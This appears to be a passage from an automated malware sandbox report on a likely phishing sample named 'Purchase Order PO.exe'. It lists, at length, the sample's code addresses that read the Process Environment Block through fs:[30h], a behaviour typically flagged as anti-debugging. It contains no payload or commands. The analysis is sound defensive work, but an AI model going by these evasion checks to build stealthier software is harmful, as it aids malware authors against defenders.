                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100035C mov eax, dword ptr fs:[00000030h]3_2_0100035C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100035C mov eax, dword ptr fs:[00000030h]3_2_0100035C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102437C mov eax, dword ptr fs:[00000030h]3_2_0102437C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE284 mov eax, dword ptr fs:[00000030h]3_2_00FBE284
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE284 mov eax, dword ptr fs:[00000030h]3_2_00FBE284
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F84260 mov eax, dword ptr fs:[00000030h]3_2_00F84260
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F84260 mov eax, dword ptr fs:[00000030h]3_2_00F84260
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F84260 mov eax, dword ptr fs:[00000030h]3_2_00F84260
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7826B mov eax, dword ptr fs:[00000030h]3_2_00F7826B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F86259 mov eax, dword ptr fs:[00000030h]3_2_00F86259
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7A250 mov eax, dword ptr fs:[00000030h]3_2_00F7A250
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010063C0 mov eax, dword ptr fs:[00000030h]3_2_010063C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7823B mov eax, dword ptr fs:[00000030h]3_2_00F7823B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103C3CD mov eax, dword ptr fs:[00000030h]3_2_0103C3CD
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010243D4 mov eax, dword ptr fs:[00000030h]3_2_010243D4
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010243D4 mov eax, dword ptr fs:[00000030h]3_2_010243D4
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E3DB mov eax, dword ptr fs:[00000030h]3_2_0102E3DB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E3DB mov eax, dword ptr fs:[00000030h]3_2_0102E3DB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E3DB mov ecx, dword ptr fs:[00000030h]3_2_0102E3DB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102E3DB mov eax, dword ptr fs:[00000030h]3_2_0102E3DB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB63FF mov eax, dword ptr fs:[00000030h]3_2_00FB63FF
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F9E3F0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F9E3F0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E3F0 mov eax, dword ptr fs:[00000030h]3_2_00F9E3F0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F903E9 mov eax, dword ptr fs:[00000030h]3_2_00F903E9
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F883C0 mov eax, dword ptr fs:[00000030h]3_2_00F883C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F883C0 mov eax, dword ptr fs:[00000030h]3_2_00F883C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F883C0 mov eax, dword ptr fs:[00000030h]3_2_00F883C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F883C0 mov eax, dword ptr fs:[00000030h]3_2_00F883C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F8A3C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F8A3C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F8A3C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F8A3C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F8A3C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8A3C0 mov eax, dword ptr fs:[00000030h]3_2_00F8A3C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01008243 mov eax, dword ptr fs:[00000030h]3_2_01008243
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01008243 mov ecx, dword ptr fs:[00000030h]3_2_01008243
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103A250 mov eax, dword ptr fs:[00000030h]3_2_0103A250
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103A250 mov eax, dword ptr fs:[00000030h]3_2_0103A250
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F78397 mov eax, dword ptr fs:[00000030h]3_2_00F78397
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F78397 mov eax, dword ptr fs:[00000030h]3_2_00F78397
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F78397 mov eax, dword ptr fs:[00000030h]3_2_00F78397
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA438F mov eax, dword ptr fs:[00000030h]3_2_00FA438F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA438F mov eax, dword ptr fs:[00000030h]3_2_00FA438F
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01030274 mov eax, dword ptr fs:[00000030h]3_2_01030274
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7E388 mov eax, dword ptr fs:[00000030h]3_2_00F7E388
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7E388 mov eax, dword ptr fs:[00000030h]3_2_00F7E388
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7E388 mov eax, dword ptr fs:[00000030h]3_2_00F7E388
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01000283 mov eax, dword ptr fs:[00000030h]3_2_01000283
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01000283 mov eax, dword ptr fs:[00000030h]3_2_01000283
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01000283 mov eax, dword ptr fs:[00000030h]3_2_01000283
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010162A0 mov eax, dword ptr fs:[00000030h]3_2_010162A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010162A0 mov ecx, dword ptr fs:[00000030h]3_2_010162A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010162A0 mov eax, dword ptr fs:[00000030h]3_2_010162A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010162A0 mov eax, dword ptr fs:[00000030h]3_2_010162A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010162A0 mov eax, dword ptr fs:[00000030h]3_2_010162A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010162A0 mov eax, dword ptr fs:[00000030h]3_2_010162A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7C310 mov ecx, dword ptr fs:[00000030h]3_2_00F7C310
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA0310 mov ecx, dword ptr fs:[00000030h]3_2_00FA0310
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA30B mov eax, dword ptr fs:[00000030h]3_2_00FBA30B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA30B mov eax, dword ptr fs:[00000030h]3_2_00FBA30B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA30B mov eax, dword ptr fs:[00000030h]3_2_00FBA30B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01016500 mov eax, dword ptr fs:[00000030h]3_2_01016500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054500 mov eax, dword ptr fs:[00000030h]3_2_01054500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054500 mov eax, dword ptr fs:[00000030h]3_2_01054500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054500 mov eax, dword ptr fs:[00000030h]3_2_01054500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054500 mov eax, dword ptr fs:[00000030h]3_2_01054500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054500 mov eax, dword ptr fs:[00000030h]3_2_01054500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054500 mov eax, dword ptr fs:[00000030h]3_2_01054500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01054500 mov eax, dword ptr fs:[00000030h]3_2_01054500
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F804E5 mov ecx, dword ptr fs:[00000030h]3_2_00F804E5
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB44B0 mov ecx, dword ptr fs:[00000030h]3_2_00FB44B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F864AB mov eax, dword ptr fs:[00000030h]3_2_00F864AB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAA470 mov eax, dword ptr fs:[00000030h]3_2_00FAA470
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAA470 mov eax, dword ptr fs:[00000030h]3_2_00FAA470
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAA470 mov eax, dword ptr fs:[00000030h]3_2_00FAA470
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA245A mov eax, dword ptr fs:[00000030h]3_2_00FA245A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010005A7 mov eax, dword ptr fs:[00000030h]3_2_010005A7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010005A7 mov eax, dword ptr fs:[00000030h]3_2_010005A7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010005A7 mov eax, dword ptr fs:[00000030h]3_2_010005A7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7645D mov eax, dword ptr fs:[00000030h]3_2_00F7645D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE443 mov eax, dword ptr fs:[00000030h]3_2_00FBE443
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA430 mov eax, dword ptr fs:[00000030h]3_2_00FBA430
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7C427 mov eax, dword ptr fs:[00000030h]3_2_00F7C427
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7E420 mov eax, dword ptr fs:[00000030h]3_2_00F7E420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7E420 mov eax, dword ptr fs:[00000030h]3_2_00F7E420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F7E420 mov eax, dword ptr fs:[00000030h]3_2_00F7E420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB8402 mov eax, dword ptr fs:[00000030h]3_2_00FB8402
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB8402 mov eax, dword ptr fs:[00000030h]3_2_00FB8402
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB8402 mov eax, dword ptr fs:[00000030h]3_2_00FB8402
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC5ED mov eax, dword ptr fs:[00000030h]3_2_00FBC5ED
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC5ED mov eax, dword ptr fs:[00000030h]3_2_00FBC5ED
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F825E0 mov eax, dword ptr fs:[00000030h]3_2_00F825E0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE5E7 mov eax, dword ptr fs:[00000030h]3_2_00FAE5E7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006420 mov eax, dword ptr fs:[00000030h]3_2_01006420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006420 mov eax, dword ptr fs:[00000030h]3_2_01006420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006420 mov eax, dword ptr fs:[00000030h]3_2_01006420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006420 mov eax, dword ptr fs:[00000030h]3_2_01006420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006420 mov eax, dword ptr fs:[00000030h]3_2_01006420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006420 mov eax, dword ptr fs:[00000030h]3_2_01006420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01006420 mov eax, dword ptr fs:[00000030h]3_2_01006420
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F865D0 mov eax, dword ptr fs:[00000030h]3_2_00F865D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA5D0 mov eax, dword ptr fs:[00000030h]3_2_00FBA5D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA5D0 mov eax, dword ptr fs:[00000030h]3_2_00FBA5D0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE5CF mov eax, dword ptr fs:[00000030h]3_2_00FBE5CF
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE5CF mov eax, dword ptr fs:[00000030h]3_2_00FBE5CF
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA45B1 mov eax, dword ptr fs:[00000030h]3_2_00FA45B1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA45B1 mov eax, dword ptr fs:[00000030h]3_2_00FA45B1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103A456 mov eax, dword ptr fs:[00000030h]3_2_0103A456
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100C460 mov ecx, dword ptr fs:[00000030h]3_2_0100C460
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBE59C mov eax, dword ptr fs:[00000030h]3_2_00FBE59C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB4588 mov eax, dword ptr fs:[00000030h]3_2_00FB4588
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F82582 mov eax, dword ptr fs:[00000030h]3_2_00F82582
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F82582 mov ecx, dword ptr fs:[00000030h]3_2_00F82582
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB656A mov eax, dword ptr fs:[00000030h]3_2_00FB656A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB656A mov eax, dword ptr fs:[00000030h]3_2_00FB656A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB656A mov eax, dword ptr fs:[00000030h]3_2_00FB656A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0103A49A mov eax, dword ptr fs:[00000030h]3_2_0103A49A
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88550 mov eax, dword ptr fs:[00000030h]3_2_00F88550
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F88550 mov eax, dword ptr fs:[00000030h]3_2_00F88550
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100A4B0 mov eax, dword ptr fs:[00000030h]3_2_0100A4B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE53E mov eax, dword ptr fs:[00000030h]3_2_00FAE53E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE53E mov eax, dword ptr fs:[00000030h]3_2_00FAE53E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE53E mov eax, dword ptr fs:[00000030h]3_2_00FAE53E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE53E mov eax, dword ptr fs:[00000030h]3_2_00FAE53E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FAE53E mov eax, dword ptr fs:[00000030h]3_2_00FAE53E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90535 mov eax, dword ptr fs:[00000030h]3_2_00F90535
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90535 mov eax, dword ptr fs:[00000030h]3_2_00F90535
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90535 mov eax, dword ptr fs:[00000030h]3_2_00F90535
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90535 mov eax, dword ptr fs:[00000030h]3_2_00F90535
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90535 mov eax, dword ptr fs:[00000030h]3_2_00F90535
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F90535 mov eax, dword ptr fs:[00000030h]3_2_00F90535
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FFE6F2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FFE6F2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FFE6F2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE6F2 mov eax, dword ptr fs:[00000030h]3_2_00FFE6F2
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA6C7 mov ebx, dword ptr fs:[00000030h]3_2_00FBA6C7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA6C7 mov eax, dword ptr fs:[00000030h]3_2_00FBA6C7
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB66B0 mov eax, dword ptr fs:[00000030h]3_2_00FB66B0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_01004755 mov eax, dword ptr fs:[00000030h]3_2_01004755
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBC6A6 mov eax, dword ptr fs:[00000030h]3_2_00FBC6A6
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100E75D mov eax, dword ptr fs:[00000030h]3_2_0100E75D
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F84690 mov eax, dword ptr fs:[00000030h]3_2_00F84690
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F84690 mov eax, dword ptr fs:[00000030h]3_2_00F84690
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0102678E mov eax, dword ptr fs:[00000030h]3_2_0102678E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB2674 mov eax, dword ptr fs:[00000030h]3_2_00FB2674
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA660 mov eax, dword ptr fs:[00000030h]3_2_00FBA660
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FBA660 mov eax, dword ptr fs:[00000030h]3_2_00FBA660
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010347A0 mov eax, dword ptr fs:[00000030h]3_2_010347A0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9C640 mov eax, dword ptr fs:[00000030h]3_2_00F9C640
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_010007C3 mov eax, dword ptr fs:[00000030h]3_2_010007C3
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8262C mov eax, dword ptr fs:[00000030h]3_2_00F8262C
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB6620 mov eax, dword ptr fs:[00000030h]3_2_00FB6620
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FB8620 mov eax, dword ptr fs:[00000030h]3_2_00FB8620
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9E627 mov eax, dword ptr fs:[00000030h]3_2_00F9E627
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0100E7E1 mov eax, dword ptr fs:[00000030h]3_2_0100E7E1
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FC2619 mov eax, dword ptr fs:[00000030h]3_2_00FC2619
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9260B mov eax, dword ptr fs:[00000030h]3_2_00F9260B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9260B mov eax, dword ptr fs:[00000030h]3_2_00F9260B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9260B mov eax, dword ptr fs:[00000030h]3_2_00F9260B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9260B mov eax, dword ptr fs:[00000030h]3_2_00F9260B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9260B mov eax, dword ptr fs:[00000030h]3_2_00F9260B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9260B mov eax, dword ptr fs:[00000030h]3_2_00F9260B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F9260B mov eax, dword ptr fs:[00000030h]3_2_00F9260B
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FFE609 mov eax, dword ptr fs:[00000030h]3_2_00FFE609
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F847FB mov eax, dword ptr fs:[00000030h]3_2_00F847FB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F847FB mov eax, dword ptr fs:[00000030h]3_2_00F847FB
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA27ED mov eax, dword ptr fs:[00000030h]3_2_00FA27ED
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA27ED mov eax, dword ptr fs:[00000030h]3_2_00FA27ED
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00FA27ED mov eax, dword ptr fs:[00000030h]3_2_00FA27ED
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F8C7C0 mov eax, dword ptr fs:[00000030h]3_2_00F8C7C0
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_00F807AF mov eax, dword ptr fs:[00000030h]3_2_00F807AF
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104866E mov eax, dword ptr fs:[00000030h]3_2_0104866E
                      Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 3_2_0104866E mov eax, dword ptr fs:[00000030h]3_2_0104866E
